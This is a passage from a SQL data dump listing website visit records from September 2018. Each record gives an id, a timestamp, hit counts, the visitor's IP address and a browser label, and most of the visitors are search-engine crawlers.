,1,1,0,0,'173.252.95.29','other'),(299116,1536246971,1,1,0,0,'66.249.66.74','chrome'),(299117,1536247038,1,1,0,0,'40.77.167.123','other'),(299118,1536247160,1,1,0,0,'54.36.148.86','other'),(299119,1536247278,1,1,0,0,'54.36.149.59','other'),(299120,1536247534,3,3,0,0,'66.249.66.75','chrome'),(299121,1536247858,1,1,0,0,'204.12.226.26','other'),(299122,1536247899,7,7,0,0,'66.249.66.73','chrome'),(299123,1536247923,3,3,0,0,'66.249.66.74','chrome'),(299124,1536248337,1,1,0,0,'54.36.148.135','other'),(299125,1536248436,1,1,0,0,'54.36.148.12','other'),(299126,1536248630,1,1,0,0,'54.36.148.223','other'),(299127,1536248696,1,1,0,0,'54.36.149.87','other'),(299128,1536248764,1,1,0,0,'54.36.148.181','other'),(299129,1536249032,4,4,0,0,'66.249.66.74','chrome'),(299130,1536249065,1,1,0,0,'207.46.13.64','other'),(299131,1536249138,1,1,0,0,'54.36.148.214','other'),(299132,1536249196,1,1,0,0,'54.36.148.249','other'),(299133,1536249225,4,4,0,0,'66.249.66.75','chrome'),(299134,1536249232,1,1,0,0,'178.154.171.88','other'),(299135,1536249380,1,1,0,0,'54.36.149.94','other'),(299136,1536249480,2,2,0,0,'5.45.207.19','other'),(299137,1536249813,3,3,0,0,'66.249.66.73','chrome'),(299138,1536249881,1,1,0,0,'54.36.148.208','other'),(299139,1536249928,1,1,0,0,'80.180.29.31','other'),(299140,1536249976,1,1,0,0,'66.249.66.74','chrome'),(299141,1536250000,1,1,0,0,'54.36.148.193','other'),(299142,1536250022,1,1,0,0,'54.36.148.119','other'),(299143,1536250042,1,1,0,0,'54.36.148.172','other'),(299144,1536250309,1,1,0,0,'91.196.178.181','chrome'),(299145,1536251070,3,3,0,0,'66.249.66.75','chrome'),(299146,1536251129,1,1,0,0,'54.36.148.21','other'),(299147,1536251138,1,1,0,0,'54.36.148.139','other'),(299148,1536251152,4,3,1,0,'66.249.66.73',''),(299149,1536251158,1,1,0,0,'188.230.43.254','other'),(299150,1536251215,1,1,0,0,'54.36.149.5','other'),(299151,1536251233,26,26,0,0,'209.54.43.202','other'),(299152,1536251287,1,1,0,0,'54.36.148.68','other'),(299153,1536251521,1,1,0,0,'193.106.30.98','firefox'),(299154,1536251534,1,1,0,0,'54.36.149.91','other'),(299155,1536251613,3,3,0,0,'66.249.66.73','chrome'),(299156,1536251745,1,1,0,0,'54.36.148.210','other'),(299157,1536252074,1,1,0,0,'54.36.149.44','other'),(299158,1536252252,1,1,0,0,'54.36.148.34','other'),(299159,1536252341,1,1,0,0,'54.36.148.50','other'),(299160,1536252401,1,1,0,0,'8.29.198.27','other'),(299161,1536252411,1,1,0,0,'54.36.149.72','other'),(299162,1536252515,1,1,0,0,'54.36.148.66','other'),(299163,1536252554,1,1,0,0,'66.249.66.75','chrome'),(299164,1536252644,2,2,0,0,'66.249.66.26','chrome'),(299165,1536252695,2,2,0,0,'95.163.255.114','other'),(299166,1536252701,3,3,0,0,'66.249.66.74','chrome'),(299167,1536252705,1,1,0,0,'95.163.255.102','other'),(299168,1536252709,1,1,0,0,'95.163.255.113','other'),(299169,1536252755,1,1,0,0,'54.36.149.65','other'),(299170,1536252991,1,1,0,0,'188.230.43.254','other'),(299171,1536253036,1,1,0,0,'66.249.66.73','chrome'),(299172,1536253168,1,1,0,0,'92.113.189.235','chrome'),(299173,1536253372,1,1,0,0,'54.36.148.137','other'),(299174,1536253501,2,2,0,0,'54.36.148.254','other'),(299175,1536253522,1,1,0,0,'54.36.149.38','other'),(299176,1536253672,1,1,0,0,'54.36.148.247','other'),(299177,1536253830,1,1,0,0,'54.36.149.79','other'),(299178,1536253935,1,1,0,0,'40.77.167.71','other'),(299179,1536253938,1,1,0,0,'66.249.66.73','chrome'),(299180,1536254074,3,3,0,0,'66.249.66.75','chrome'),(299181,1536254302,1,1,0,0,'54.36.149.22','other'),(299182,1536254312,1,1,0,0,'216.244.66.241','other'),(299183,1536254351,1,1,0,0,'54.36.148.219','other'),(299184,1536254394,1,1,0,0,'54.36.148.245','other'),(299185,1536254479,1,1,0,0,'66.249.66.27','chrome'),(299186,1536254486,1,1,0,0,'54.36.148.138','other'),(299187,1536254496,1,1,0,0,'54.36.148.166','other'),(299188,1536254687,1,1,0,0,'66.249.66.74','chrome'),(299189,1536254733,1,1,0,0,'54.36.149.13','other'),(299190,1536254757,1,1,0,0,'54.36.148.250','other'),(299191,1536254859,2,2,0,0,'66.249.66.73','chrome'),(299192,1536254981,1,1,0,0,'54.36.148.113','other'),(299193,1536255103,1,1,0,0,'66.249.66.76','chrome'),(299194,1536255113,2,2,0,0,'91.196.178.180','chrome'),(299195,1536255223,1,1,0,0,'54.36.148.218','other'),(299196,1536255424,1,1,0,0,'54.36.148.121','other'),(299197,1536255470,1,1,0,0,'54.36.148.52','other'),(299198,1536255516,1,1,0,0,'54.36.148.184','other'),(299199,1536255582,1,1,0,0,'54.36.148.69','other'),(299200,1536255782,3,3,0,0,'66.249.66.75','chrome'),(299201,1536255866,1,1,0,0,'54.36.149.57','other'),(299202,1536255899,1,1,0,0,'54.36.148.180','other'),(299203,1536255919,1,1,0,0,'54.36.149.9','other'),(299204,1536255968,1,1,0,0,'188.230.43.254','other'),(299205,1536256045,1,1,0,0,'54.36.148.114','other'),(299206,1536256049,1,1,0,0,'54.36.148.231','other'),(299207,1536256052,2,2,0,0,'66.249.66.73','chrome'),(299208,1536256094,1,1,0,0,'91.196.178.86','firefox'),(299209,1536256150,1,1,0,0,'193.106.30.98','firefox'),(299210,1536256240,1,1,0,0,'54.36.148.221','other'),(299211,1536256328,1,1,0,0,'54.36.149.70','other'),(299212,1536256594,4,4,0,0,'66.249.66.74','chrome'),(299213,1536256954,1,1,0,0,'54.36.149.38','other'),(299214,1536256989,1,1,0,0,'54.36.148.26','other'),(299215,1536257030,2,2,0,0,'66.249.66.73','chrome'),(299216,1536257109,3,3,0,0,'66.249.66.75','chrome'),(299217,1536257189,1,1,0,0,'54.36.148.23','other'),(299218,1536257339,1,1,0,0,'54.36.148.109','other'),(299219,1536257345,1,1,0,0,'54.36.149.39','other'),(299220,1536257502,1,1,0,0,'95.163.255.99','other'),(299221,1536257684,1,1,0,0,'66.249.66.26','chrome'),(299222,1536257774,1,1,0,0,'54.36.148.104','other'),(299223,1536257857,1,1,0,0,'195.211.61.60','chrome'),(299224,1536257860,1,1,0,0,'54.36.149.14','other'),(299225,1536257878,1,1,0,0,'54.36.148.235','other'),(299226,1536257901,1,1,0,0,'54.36.149.47','other'),(299227,1536257981,1,1,0,0,'54.36.148.97','other'),(299228,1536258030,1,1,0,0,'66.102.9.157','chrome'),(299229,1536258081,1,1,0,0,'54.36.149.54','other'),(299230,1536258255,4,4,0,0,'66.249.66.73','chrome'),(299231,1536258368,2,2,0,0,'66.249.66.74','chrome'),(299232,1536258544,1,1,0,0,'54.36.148.218','other'),(299233,1536258549,3,3,0,0,'66.249.66.75','chrome'),(299234,1536258554,1,1,0,0,'54.36.149.78','other'),(299235,1536258674,1,1,0,0,'54.36.148.113','other'),(299236,1536258785,1,1,0,0,'54.36.148.79','other'),(299237,1536259134,1,1,0,0,'54.36.149.67','other'),(299238,1536259162,1,1,0,0,'157.55.39.212','other'),(299239,1536259344,1,1,0,0,'54.36.148.247','other'),(299240,1536259345,1,1,0,0,'54.36.148.195','other'),(299241,1536259450,1,1,0,0,'54.36.148.157','other'),(299242,1536259743,4,4,0,0,'66.249.66.74','chrome'),(299243,1536259809,1,1,0,0,'54.36.148.116','other'),(299244,1536259883,1,1,0,0,'109.120.40.193','msie'),(299245,1536259971,1,1,0,0,'46.211.113.190','other'),(299246,1536260031,1,1,0,0,'54.36.148.198','other'),(299247,1536260058,2,2,0,0,'66.249.66.73','chrome'),(299248,1536260165,1,1,0,0,'216.244.66.241','other'),(299249,1536260280,1,1,0,0,'54.36.149.93','other'),(299250,1536260519,1,1,0,0,'54.36.148.190','other'),(299251,1536260920,1,1,0,0,'54.36.148.112','other'),(299252,1536260940,1,1,0,0,'54.36.148.70','other'),(299253,1536261004,1,1,0,0,'54.36.148.30','other'),(299254,1536261087,1,1,0,0,'54.36.148.214','other'),(299255,1536261191,1,1,0,0,'54.36.148.247','other'),(299256,1536261306,1,1,0,0,'54.36.148.125','other'),(299257,1536261367,2,2,0,0,'66.249.66.73','chrome'),(299258,1536261380,1,1,0,0,'54.36.149.28','other'),(299259,1536261485,3,3,0,0,'66.249.66.75','chrome'),(299260,1536261753,1,1,0,0,'54.36.148.182','other'),(299261,1536261813,1,1,0,0,'54.36.149.97','other'),(299262,1536261844,1,1,0,0,'80.84.181.238','chrome'),(299263,1536261889,2,2,0,0,'54.165.59.7','other'),(299264,1536261930,1,1,0,0,'54.36.148.165','other'),(299265,1536262100,1,1,0,0,'66.249.66.27','chrome'),(299266,1536262398,1,1,0,0,'54.36.148.75','other'),(299267,1536262418,2,2,0,0,'66.249.66.73','chrome'),(299268,1536262624,1,1,0,0,'54.36.148.245','other'),(299269,1536262786,1,1,0,0,'54.36.149.24','other'),(299270,1536262869,1,1,0,0,'54.36.149.42','other'),(299271,1536262898,1,1,0,0,'54.36.149.58','other'),(299272,1536263089,2,2,0,0,'66.249.66.75','chrome'),(299273,1536263239,1,1,0,0,'8.29.198.27','other'),(299274,1536263330,1,1,0,0,'54.165.59.7','other'),(299275,1536263346,1,1,0,0,'54.36.148.138','other'),(299276,1536263489,1,1,0,0,'66.249.66.73','chrome'),(299277,1536263578,1,1,0,0,'54.36.148.238','other'),(299278,1536263710,1,1,0,0,'66.249.66.74','chrome'),(299279,1536263719,1,1,0,0,'54.36.148.67','other'),(299280,1536263791,1,1,0,0,'54.36.148.97','other'),(299281,1536263966,1,1,0,0,'54.36.148.87','other'),(299282,1536264084,2,2,0,0,'66.249.66.25','chrome'),(299283,1536264149,1,1,0,0,'54.36.148.248','other'),(299284,1536264214,1,1,0,0,'54.36.148.89','other'),(299285,1536264435,1,1,0,0,'54.36.148.180','other'),(299286,1536264734,1,1,0,0,'54.36.149.42','other'),(299287,1536264835,1,1,0,0,'54.36.148.104','other'),(299288,1536264939,1,1,0,0,'54.36.148.194','other'),(299289,1536265040,7,7,0,0,'66.249.66.74','chrome'),(299290,1536265066,2,2,0,0,'66.249.66.73','chrome'),(299291,1536265270,1,1,0,0,'66.249.66.75','chrome'),(299292,1536265386,1,1,0,0,'54.36.148.60','other'),(299293,1536265772,1,1,0,0,'54.36.149.34','other'),(299294,1536265885,1,1,0,0,'54.36.148.211','other'),(299295,1536265933,1,1,0,0,'54.36.148.166','other'),(299296,1536266016,1,1,0,0,'54.36.148.103','other'),(299297,1536266048,1,1,0,0,'54.36.148.92','other'),(299298,1536266067,1,1,0,0,'54.36.148.104','other'),(299299,1536266389,1,1,0,0,'54.36.149.46','other'),(299300,1536266454,1,1,0,0,'54.36.149.18','other'),(299301,1536266678,1,1,0,0,'54.36.148.146','other'),(299302,1536266719,1,1,0,0,'54.36.149.47','other'),(299303,1536266752,1,1,0,0,'54.36.148.246','other'),(299304,1536266773,1,1,0,0,'54.36.148.134','other'),(299305,1536266833,1,1,0,0,'40.77.167.71','other'),(299306,1536266965,1,1,0,0,'54.36.148.208','other'),(299307,1536267196,1,1,0,0,'54.36.149.37','other'),(299308,1536267323,2,2,0,0,'66.249.66.74','chrome'),(299309,1536267391,1,1,0,0,'54.36.149.62','other'),(299310,1536267395,1,1,0,0,'54.36.149.69','other'),(299311,1536267413,2,2,0,0,'66.249.66.75','chrome'),(299312,1536267497,1,1,0,0,'54.36.148.46','other'),(299313,1536267509,1,1,0,0,'54.36.148.233','other'),(299314,1536267545,1,1,0,0,'54.36.148.173','other'),(299315,1536267741,1,1,0,0,'54.36.148.94','other'),(299316,1536267762,1,1,0,0,'66.249.66.73','chrome'),(299317,1536268191,1,1,0,0,'54.36.149.68','other'),(299318,1536268268,1,1,0,0,'54.36.148.229','other'),(299319,1536268585,1,1,0,0,'54.36.149.7','other'),(299320,1536268725,2,2,0,0,'54.36.148.117','other'),(299321,1536268775,3,3,0,0,'66.249.66.73','chrome'),(299322,1536268837,4,4,0,0,'66.249.66.74','chrome'),(299323,1536268861,1,1,0,0,'54.36.148.34','other'),(299324,1536268921,1,1,0,0,'54.36.148.118','other'),(299325,1536268989,1,1,0,0,'54.36.148.251','other'),(299326,1536269097,2,2,0,0,'66.249.66.75','chrome'),(299327,1536269514,1,1,0,0,'69.30.198.186','other'),(299328,1536269897,2,2,0,0,'66.249.66.74','chrome'),(299329,1536269979,1,1,0,0,'54.36.149.53','other'),(299330,1536270009,1,1,0,0,'54.36.148.100','other'),(299331,1536270058,1,1,0,0,'141.8.142.74','other'),(299332,1536270125,1,1,0,0,'54.36.149.83','other'),(299333,1536270175,1,1,0,0,'54.36.148.77','other'),(299334,1536270374,1,1,0,0,'54.36.148.58','other'),(299335,1536270535,1,1,0,0,'54.36.148.14','other'),(299336,1536270734,1,1,0,0,'66.249.66.75','chrome'),(299337,1536270831,1,1,0,0,'40.77.167.71','other'),(299338,1536270870,1,1,0,0,'54.36.148.132','other'),(299339,1536270899,1,1,0,0,'178.154.171.88','other'),(299340,1536270990,1,1,0,0,'54.36.149.8','other'),(299341,1536271054,1,1,0,0,'54.36.149.28','other'),(299342,1536271139,3,3,0,0,'66.249.66.73','chrome'),(299343,1536271154,1,1,0,0,'54.36.148.46','other'),(299344,1536271234,1,1,0,0,'54.36.149.71','other'),(299345,1536271450,1,1,0,0,'54.36.148.29','other'),(299346,1536271572,1,1,0,0,'54.36.148.41','other'),(299347,1536271604,1,1,0,0,'141.8.142.74','other'),(299348,1536271605,1,1,0,0,'54.36.148.123','other'),(299349,1536271817,1,1,0,0,'54.36.148.182','other'),(299350,1536271823,1,1,0,0,'54.36.148.24','other'),(299351,1536271903,1,1,0,0,'178.154.171.88','other'),(299352,1536272143,1,1,0,0,'54.36.148.35','other'),(299353,1536272151,1,1,0,0,'66.249.66.73','chrome'),(299354,1536272265,1,1,0,0,'54.36.148.92','other'),(299355,1536272374,1,1,0,0,'54.36.148.15','other'),(299356,1536272454,1,1,0,0,'54.36.148.221','other'),(299357,1536272577,1,1,0,0,'54.36.148.208','other'),(299358,1536272596,1,1,0,0,'54.36.148.43','other'),(299359,1536272650,1,1,0,0,'54.36.149.103','other'),(299360,1536272842,2,2,0,0,'66.249.66.74','chrome'),(299361,1536273048,1,1,0,0,'54.36.148.235','other'),(299362,1536273102,1,1,0,0,'216.244.66.241','other'),(299363,1536273263,1,1,0,0,'66.249.66.73','chrome'),(299364,1536273360,3,3,0,0,'66.249.66.75','chrome'),(299365,1536273542,1,1,0,0,'54.36.149.19','other'),(299366,1536273581,1,1,0,0,'178.154.171.88','other'),(299367,1536273716,1,1,0,0,'54.36.148.146','other'),(299368,1536273794,1,1,0,0,'54.36.149.78','other'),(299369,1536273808,1,1,0,0,'54.36.148.28','other'),(299370,1536273809,1,1,0,0,'54.36.148.179','other'),(299371,1536273871,1,1,0,0,'66.249.66.74','chrome'),(299372,1536274077,1,1,0,0,'8.29.198.25','other'),(299373,1536274178,1,1,0,0,'54.36.148.121','other'),(299374,1536274694,1,1,0,0,'66.249.66.75','chrome'),(299375,1536274763,1,1,0,0,'54.36.148.12','other'),(299376,1536274984,1,1,0,0,'66.249.66.25','chrome'),(299377,1536274994,1,1,0,0,'54.36.149.79','other'),(299378,1536275029,1,1,0,0,'178.140.58.126','msie'),(299379,1536275100,1,1,0,0,'54.36.148.202','other'),(299381,1536275158,2,2,0,0,'66.249.66.73','chrome'),(299382,1536275349,1,1,0,0,'54.36.148.96','other'),(299383,1536275368,1,1,0,0,'54.36.148.18','other'),(299384,1536275384,1,1,0,0,'54.36.148.215','other'),(299385,1536275691,1,1,0,0,'54.36.149.59','other'),(299386,1536275695,1,1,0,0,'54.36.148.100','other'),(299387,1536275797,1,0,1,0,'66.249.66.74',''),(299388,1536275813,1,1,0,0,'54.36.148.92','other'),(299389,1536276134,1,0,1,0,'66.249.66.25',''),(299390,1536276497,1,1,0,0,'46.211.115.125','chrome'),(299391,1536276504,1,1,0,0,'66.249.66.75','chrome'),(299392,1536276579,1,1,0,0,'54.36.148.74','other'),(299393,1536276646,1,1,0,0,'141.8.142.74','other'),(299394,1536276647,4,4,0,0,'66.249.66.74','chrome'),(299395,1536276879,1,1,0,0,'54.36.148.82','other'),(299396,1536276905,1,1,0,0,'54.36.149.62','other'),(299397,1536276929,1,1,0,0,'54.36.149.35','other'),(299398,1536277183,1,1,0,0,'178.154.171.88','other'),(299399,1536277396,1,1,0,0,'220.181.132.195','chrome'),(299400,1536277456,1,1,0,0,'180.163.220.45','chrome'),(299401,1536277485,1,1,0,0,'66.249.66.75','chrome'),(299402,1536277781,1,1,0,0,'54.36.148.14','other'),(299403,1536277804,1,1,0,0,'54.36.148.30','other'),(299404,1536277956,2,2,0,0,'66.249.66.73','chrome'),(299405,1536278058,1,1,0,0,'54.36.148.60','other'),(299406,1536278253,1,1,0,0,'66.249.66.74','chrome'),(299407,1536278289,1,1,0,0,'54.36.149.84','other'),(299408,1536278314,1,1,0,0,'87.250.224.46','other'),(299409,1536278632,1,1,0,0,'40.77.167.71','other'),(299410,1536278694,1,1,0,0,'54.36.148.75','other'),(299411,1536278866,1,1,0,0,'66.249.66.75','chrome'),(299412,1536278879,2,2,0,0,'66.249.66.73','chrome'),(299413,1536278932,1,1,0,0,'54.36.148.87','other'),(299414,1536278956,1,1,0,0,'54.36.149.22','other'),(299415,1536278969,1,1,0,0,'54.36.148.112','other'),(299416,1536279103,1,1,0,0,'54.36.149.29','other'),(299417,1536279514,1,1,0,0,'54.36.148.79','other'),(299418,1536279592,1,1,0,0,'216.244.66.241','other'),(299419,1536279724,1,1,0,0,'54.36.149.78','other'),(299420,1536280103,1,1,0,0,'66.249.66.27','chrome'),(299421,1536280142,1,1,0,0,'54.36.149.30','other'),(299422,1536280212,1,1,0,0,'54.36.148.71','other'),(299423,1536280302,1,1,0,0,'54.36.148.226','other'),(299424,1536280516,2,2,0,0,'66.249.66.75','chrome'),(299425,1536280826,1,1,0,0,'66.249.66.74','chrome'),(299426,1536280892,1,1,0,0,'54.36.148.180','other'),(299427,1536281081,1,1,0,0,'54.36.148.248','other'),(299428,1536281343,1,1,0,0,'54.36.148.252','other'),(299429,1536281367,1,1,0,0,'54.36.148.220','other'),(299430,1536281587,1,1,0,0,'54.36.148.101','other'),(299431,1536281595,1,1,0,0,'54.36.148.139','other'),(299432,1536281662,2,1,1,0,'66.249.66.75',''),(299433,1536281761,1,1,0,0,'54.36.149.39','other'),(299434,1536281797,1,1,0,0,'54.36.148.118','other'),(299435,1536281800,1,1,0,0,'66.249.66.74','chrome'),(299436,1536281905,1,1,0,0,'54.36.148.85','other'),(299437,1536282139,1,1,0,0,'216.244.66.241','other'),(299438,1536282184,1,1,0,0,'54.36.149.107','other'),(299439,1536282225,1,1,0,0,'54.36.148.42','other'),(299440,1536282391,2,2,0,0,'54.36.148.29','other'),(299441,1536282442,2,2,0,0,'66.249.66.73','chrome'),(299442,1536282631,1,1,0,0,'54.36.148.97','other'),(299443,1536282838,1,1,0,0,'54.36.149.38','other'),(299444,1536282921,1,0,1,0,'66.249.66.27',''),(299445,1536282942,1,0,1,0,'66.249.66.74',''),(299446,1536282969,1,1,0,0,'54.36.148.157','other'),(299447,1536283075,1,1,0,0,'54.36.149.32','other'),(299448,1536283265,1,1,0,0,'54.36.149.10','other'),(299449,1536283266,1,1,0,0,'54.36.148.10','other'),(299450,1536283491,3,3,0,0,'66.249.66.74','chrome'),(299451,1536283493,1,1,0,0,'54.36.148.98','other'),(299452,1536283496,2,2,0,0,'66.249.66.73','chrome'),(299453,1536283722,10,10,0,0,'167.114.1.124','other'),(299454,1536283838,1,1,0,0,'54.36.148.69','other'),(299455,1536283885,1,1,0,0,'66.249.66.75','chrome'),(299456,1536283915,1,1,0,0,'144.76.38.10','other'),(299457,1536284212,1,1,0,0,'178.154.171.88','other'),(299458,1536284925,1,1,0,0,'8.29.198.26','other'),(299459,1536285289,1,1,0,0,'40.77.167.71','other'),(299460,1536286139,2,2,0,0,'66.249.66.73','chrome'),(299461,1536286162,1,1,0,0,'87.250.224.46','other'),(299462,1536287062,4,4,0,0,'66.249.66.73','chrome'),(299463,1536287170,1,1,0,0,'66.249.66.74','chrome'),(299464,1536287489,11,11,0,0,'178.63.34.189','other'),(299465,1536287936,1,1,0,0,'178.154.171.88','other'),(299466,1536287943,2,2,0,0,'66.249.66.75','chrome'),(299467,1536287966,2,2,0,0,'66.249.66.73','chrome'),(299468,1536288938,1,1,0,0,'178.154.171.88','other'),(299469,1536288957,2,2,0,0,'66.249.66.73','chrome'),(299470,1536288981,2,2,0,0,'66.249.66.75','chrome'),(299471,1536289463,1,1,0,0,'52.34.24.33','chrome'),(299472,1536290038,1,1,0,0,'66.249.66.75','chrome'),(299473,1536290519,3,3,0,0,'66.249.66.73','chrome'),(299474,1536291332,1,1,0,0,'66.249.66.74','chrome'),(299475,1536291392,1,1,0,0,'66.249.66.75','chrome'),(299476,1536291542,1,1,0,0,'66.249.66.27','chrome'),(299477,1536291552,1,1,0,0,'141.8.142.74','other'),(299478,1536292113,1,1,0,0,'66.249.66.73','chrome'),(299479,1536292375,1,1,0,0,'178.154.171.88','other'),(299480,1536292512,2,2,0,0,'66.249.66.74','chrome'),(299481,1536292978,1,1,0,0,'66.249.66.75','chrome'),(299482,1536293447,2,2,0,0,'141.8.142.74','other'),(299483,1536293666,1,1,0,0,'35.162.214.175','chrome'),(299484,1536294027,5,4,1,0,'66.249.66.73',''),(299485,1536294174,4,4,0,0,'66.249.66.74','chrome'),(299486,1536294335,23,23,0,0,'148.251.120.201','other'),(299487,1536294979,1,1,0,0,'66.249.66.27','chrome'),(299488,1536294985,1,0,1,0,'66.249.66.75',''),(299489,1536295069,1,1,0,0,'87.250.224.46','other'),(299490,1536295073,1,1,0,0,'178.154.200.41','other'),(299491,1536295076,1,0,1,0,'66.249.66.25',''),(299492,1536295299,3,3,0,0,'66.249.66.75','chrome'),(299493,1536295759,1,1,0,0,'8.29.198.27','other'),(299494,1536295760,4,4,0,0,'66.249.66.74','chrome'),(299495,1536295775,1,1,0,0,'66.249.66.26','chrome'),(299496,1536295786,4,4,0,0,'66.249.66.73','chrome'),(299497,1536295848,1,1,0,0,'216.244.66.241','other'),(299498,1536296778,2,2,0,0,'66.249.66.74','chrome'),(299499,1536296838,1,0,1,0,'66.249.66.73',''),(299500,1536297005,1,1,0,0,'178.154.171.88','other'),(299501,1536297130,1,1,0,0,'66.249.66.26','chrome'),(299502,1536297144,3,3,0,0,'66.249.66.75','chrome'),(299503,1536297293,3,3,0,0,'66.249.66.73','chrome'),(299504,1536297422,1,1,0,0,'141.8.142.74','other'),(299505,1536297594,1,1,0,0,'37.54.125.100','chrome'),(299506,1536297685,3,3,0,0,'66.249.66.74','chrome'),(299507,1536298276,1,1,0,0,'66.249.66.73','chrome'),(299508,1536298621,1,1,0,0,'141.8.142.74','other'),(299509,1536298802,3,3,0,0,'91.196.177.43','chrome'),(299510,1536299256,1,0,1,0,'66.249.66.74',''),(299511,1536299417,4,4,0,0,'66.249.66.74','chrome'),(299512,1536299707,2,2,0,0,'91.196.178.85','chrome'),(299513,1536300312,2,2,0,0,'66.249.66.27','chrome'),(299514,1536300670,2,1,1,0,'66.249.66.73',''),(299515,1536300735,2,2,0,0,'66.249.66.74','chrome'),(299516,1536300806,1,1,0,0,'78.111.185.142','chrome'),(299517,1536300830,1,1,0,0,'176.111.33.18','chrome'),(299518,1536301490,1,1,0,0,'178.154.171.88','other'),(299519,1536301548,2,2,0,0,'66.249.66.73','chrome'),(299520,1536301769,1,1,0,0,'66.102.9.22','chrome'),(299521,1536301879,1,1,0,0,'66.249.66.75','chrome'),(299522,1536302030,1,1,0,0,'66.249.66.74','chrome'),(299523,1536302099,1,1,0,0,'66.249.66.26','chrome'),(299524,1536302848,1,1,0,0,'66.249.66.75','chrome'),(299525,1536303065,2,1,1,0,'66.249.66.73',''),(299526,1536303095,3,3,0,0,'66.249.66.74','chrome'),(299527,1536303272,1,1,0,0,'141.8.142.74','other'),(299528,1536303881,3,3,0,0,'66.249.66.73','chrome'),(299529,1536304023,1,0,1,0,'66.249.66.74',''),(299530,1536304704,1,1,0,0,'66.249.66.74','chrome'),(299531,1536305547,1,1,0,0,'178.95.67.148','chrome'),(299532,1536305889,2,1,1,0,'66.249.66.73',''),(299533,1536306145,2,2,0,0,'178.154.244.29','other'),(299534,1536306398,2,2,0,0,'66.249.66.75','chrome'),(299535,1536306475,2,2,0,0,'66.249.66.74','chrome'),(299536,1536306593,1,1,0,0,'8.29.198.25','other'),(299537,1536306889,1,1,0,0,'66.249.66.27','chrome'),(299538,1536306929,1,1,0,0,'54.36.148.145','other'),(299539,1536306980,1,1,0,0,'54.36.148.189','other'),(299540,1536307090,1,1,0,0,'66.249.66.73','chrome'),(299541,1536307326,1,1,0,0,'54.36.148.108','other'),(299542,1536307330,1,1,0,0,'54.36.148.199','other'),(299543,1536307332,1,1,0,0,'54.36.148.90','other'),(299544,1536307578,1,1,0,0,'54.36.149.35','other'),(299545,1536307681,1,1,0,0,'54.36.148.228','other'),(299546,1536307720,1,1,0,0,'54.36.149.101','other'),(299547,1536307757,1,1,0,0,'66.249.66.75','chrome'),(299548,1536307778,1,1,0,0,'54.36.149.47','other'),(299549,1536308003,2,2,0,0,'66.249.66.74','chrome'),(299550,1536308034,1,1,0,0,'54.36.149.54','other'),(299551,1536308344,1,1,0,0,'54.36.149.87','other'),(299552,1536308583,1,1,0,0,'54.36.148.52','other'),(299553,1536308664,1,0,1,0,'66.249.66.73',''),(299554,1536308713,1,1,0,0,'54.36.148.140','other'),(299555,1536308758,1,1,0,0,'54.36.148.11','other'),(299556,1536308776,1,1,0,0,'54.36.148.182','other'),(299557,1536308923,1,1,0,0,'54.36.148.80','other'),(299558,1536309063,1,1,0,0,'54.36.149.71','other'),(299559,1536309173,1,1,0,0,'54.165.59.7','other'),(299560,1536309266,1,1,0,0,'54.36.148.145','other'),(299561,1536309490,1,1,0,0,'66.249.66.74','chrome'),(299562,1536309538,1,1,0,0,'54.36.148.250','other'),(299563,1536309613,1,1,0,0,'54.36.148.195','other'),(299564,1536309748,1,1,0,0,'66.249.66.25','chrome'),(299565,1536309805,2,2,0,0,'66.249.66.75','chrome'),(299566,1536310175,1,1,0,0,'54.36.149.67','other'),(299567,1536310232,1,1,0,0,'54.36.149.90','other'),(299568,1536310255,1,1,0,0,'54.36.149.10','other'),(299569,1536310433,1,1,0,0,'66.249.66.74','chrome'),(299570,1536310465,1,1,0,0,'178.154.244.11','other'),(299571,1536310502,1,1,0,0,'54.36.148.41','other'),(299572,1536310503,1,1,0,0,'5.45.207.19','other'),(299573,1536310518,1,1,0,0,'54.36.148.208','other'),(299574,1536310767,1,1,0,0,'95.132.57.165','chrome'),(299575,1536310823,1,1,0,0,'66.249.64.135','chrome'),(299576,1536310879,1,1,0,0,'54.36.149.29','other'),(299577,1536310887,1,1,0,0,'66.249.66.75','chrome'),(299578,1536311001,1,0,1,0,'66.249.66.73',''),(299579,1536311229,1,1,0,0,'54.36.148.164','other'),(299580,1536311261,1,1,0,0,'54.36.149.74','other'),(299581,1536311278,1,1,0,0,'66.249.66.73','chrome'),(299582,1536311344,1,1,0,0,'54.36.148.219','other'),(299583,1536311473,1,1,0,0,'40.77.167.152','other'),(299584,1536311590,2,2,0,0,'54.36.148.177','other'),(299585,1536311629,1,1,0,0,'54.36.148.122','other'),(299586,1536311883,1,1,0,0,'54.36.148.23','other'),(299587,1536312041,1,1,0,0,'54.36.148.250','other'),(299588,1536312050,1,1,0,0,'54.36.149.53','other'),(299589,1536312097,2,2,0,0,'91.196.178.89','chrome'),(299590,1536312173,1,1,0,0,'66.249.66.74','chrome'),(299591,1536312229,1,1,0,0,'54.36.148.39','other'),(299592,1536312273,1,1,0,0,'178.154.244.11','other'),(299593,1536312293,1,1,0,0,'54.36.148.51','other'),(299594,1536312441,1,1,0,0,'54.36.149.80','other'),(299595,1536312575,1,1,0,0,'54.36.148.79','other'),(299596,1536312594,1,1,0,0,'46.200.3.194','chrome'),(299597,1536312647,1,1,0,0,'92.113.189.235','chrome'),(299598,1536313077,1,1,0,0,'54.36.149.84','other'),(299599,1536313146,1,1,0,0,'54.36.149.32','other'),(299600,1536313253,1,0,1,0,'66.249.66.73',''),(299601,1536313618,1,1,0,0,'54.36.149.81','other'),(299602,1536313657,1,1,0,0,'54.36.149.82','other'),(299603,1536313723,1,1,0,0,'54.36.148.72','other'),(299604,1536313874,1,1,0,0,'91.196.178.184','chrome'),(299605,1536313926,3,3,0,0,'66.249.66.73','chrome'),(299606,1536313982,1,1,0,0,'66.249.66.74','chrome'),(299607,1536314031,1,1,0,0,'54.36.148.190','other'),(299608,1536314158,1,1,0,0,'66.249.66.26','chrome'),(299609,1536314360,1,1,0,0,'54.36.149.29','other'),(299610,1536314467,1,1,0,0,'5.45.207.79','other'),(299611,1536314572,1,1,0,0,'54.36.148.149','other'),(299612,1536314792,1,1,0,0,'54.36.149.68','other'),(299613,1536314851,1,1,0,0,'54.36.148.19','other'),(299614,1536314898,1,1,0,0,'207.46.13.64','other'),(299615,1536314903,2,2,0,0,'66.249.66.73','chrome'),(299616,1536314957,1,1,0,0,'54.36.149.67','other'),(299617,1536315024,1,1,0,0,'54.36.148.181','other'),(299618,1536315039,1,1,0,0,'54.36.148.94','other'),(299619,1536315268,2,1,1,0,'66.249.66.74',''),(299620,1536315292,1,1,0,0,'54.36.148.133','other'),(299621,1536315413,1,1,0,0,'54.36.148.145','other'),(299622,1536315493,1,1,0,0,'54.36.148.11','other'),(299623,1536315582,1